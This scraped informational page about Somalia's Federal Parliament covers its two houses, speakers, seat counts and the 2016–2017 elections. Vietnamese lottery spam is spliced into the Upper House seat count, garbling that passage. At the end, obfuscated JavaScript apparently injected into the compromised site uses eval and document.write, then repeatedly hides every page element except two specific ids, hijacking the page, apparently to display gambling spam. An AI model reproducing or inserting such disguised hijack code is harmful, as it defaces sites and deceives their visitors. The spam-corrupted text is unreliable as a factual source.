Somali Federal Parliament

House of the people 

Somali Parliament Speaker H.E Mohamed Mursal Abdirahman

The Federal Parliament of Somalia is the national parliament of Somalia. it is based in the capital Mogadishu and is bicameral. Founded: August 20, 1956, Seats: 275, Type of business: Bicameral The Federal Parliament of Somalia constitutes the legislative branch of government, with the Federal Government of Somalia representing the executive division. The parliament elects the President, Speaker of Parliament and Deputy Speakers. It also has the authority to pass and veto laws.In addition, the national parliament is tasked with selecting the ultimate number and boundaries of the autonomous regional states (officially, Federal Member States) within the Federal Republic of Somalia.

Upper House

Somali Upper House Speaker H.E Abdi Hashi Abdullahi

Description: Founded:  2016 Seats :  54Trò chơi xổ số Việt Nam senators The Senate, or Upper house, was elected during Somali parliamentary election held on 2016 and it contains 54 senators,  in October and November 2016. The Upper House was elected on 10 October, with voting taking place for the House of the People, which was elected between 23 October and 10 November 2016. They were the first elections since 1984, and the newly elected Parliament was due to elect the President on 30 November. However, the presidential elections were delayed and eventually held on 8 February 2017, when the MPs and Senators elected Mohamed Abdullahi Mohamed as President.

var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}